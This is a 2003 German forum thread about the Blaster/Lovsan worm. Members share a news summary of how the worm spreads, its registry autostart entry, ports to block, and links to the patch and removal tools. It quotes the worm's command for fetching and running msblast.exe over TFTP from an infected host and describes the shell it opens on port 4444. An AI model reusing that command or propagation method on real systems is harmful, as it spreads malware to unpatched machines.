| | # 1 |
| Netzweltpionier Registriert seit: 07.12.2002 Ort: Em Alde Nüss
Beiträge: 2.517
| Alle Schotten dicht -- W32.Blaster greift an Der seit Tagen erwartete Wurm, der einen Fehler im RPC/DCOM-Dienst unter Windows 2000 und XP ausnutzt, ist im Internet unterwegs. Symantec taufte ihn W32.Blaster, McAfee nennt ihn W32.Lovsan. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat ebenfalls bereits eine Warnung herausgegben, siehe dazu das BSI-Advisory auf heise Security. Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows-Systeme (B) auf Port 135 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgeführt, der auf System B eine Shell auf Port 4444 öffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%\System32 nachzuladen und zu starten. Anschließend installiert sich der Wurm auf System B, schließt Port 4444, startet einen TFTP-Server und greift weitere Systeme an. Der Wurm versucht nach Angaben von Symantec eine Denial-of-Service-Attacke gegen windowsupdate.com durchzuführen. Als Zeitraum dafür ist der 16. August bis 31. Dezember definiert. ... weiter ... und
__________________ |
|
| | # 5 |
| Eine Frau fuer gewisse Stunden im Forum Registriert seit: 12.05.2003 Ort: Berlin
Beiträge: 772
| Könnt Ihr mal hier schauen, das Thema gibt es schon. Vielleicht weiss da gleich noch jemand eine Antwort auf meine einfache Frage. |
|
| | # 15 |
| Registriert seit: 19.10.2002
Beiträge: 3.109
| @Deguchillo Vielleicht hilft dir das: http://www.wer-weiss-was.de/theme14/article955225.html ansonsten einfach mal nach tftp.exe googeln.Glaub nicht das das was mit dem Blaster zu tun hat. Hier mal noch die offiziellen Infos von Microsoft zur Schwachstelle die vom Blaster ausgenutzt wird: http://www.microsoft.com/germany/ms/...inms03-026.htm Für alle die es nicht schaffen den Patch runterzuladen weil der Rechner vorher runterfährt dürfte die (eventuell temporäre) Deaktivierung von DCOM interessant sein.Ist im Link erklärt. hyrican |
|
| | # 16 |
| ...ist anders... Registriert seit: 05.10.2002
Beiträge: 6.121
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\ Run "windows auto update" = msblast.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\ Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill den schnodder loeschen und folgende ports zumachen: 69 UDP 135 TCP 135 UDP 139 TCP 139 UDP 445 TCP 445 UDP 4444 TCP der wurm verbreitet sich dank TFTP, so infiziert er andere systeme... boom, alle ungepachten systeme sind betroffen... patch besorgen und vorher alles saeubern. es gibt auch verschiedene removaltools: removaltool von symantec es gibt noch weitere, aber ich denke der eine link reicht vorerst. patch fuer die sicherheitsluecke: patchseite von winzigweich del/FTF |
|
| | # 19 |
| Registriert seit: 19.10.2002
Beiträge: 3.109
| Noch ein paar Neuigkeiten zum Blaster: http://www.heise.de/newsticker/data/dab-13.08.03-001/ http://www.heise.de/newsticker/data/dab-13.08.03-002/ hyrican |
|
| | # -- |
| News Flash | Das könnte Dich auch noch interessieren:
Nicht fündig geworden? Dann ohne Anmeldung in unserem Gast-Forum nachfragen. |




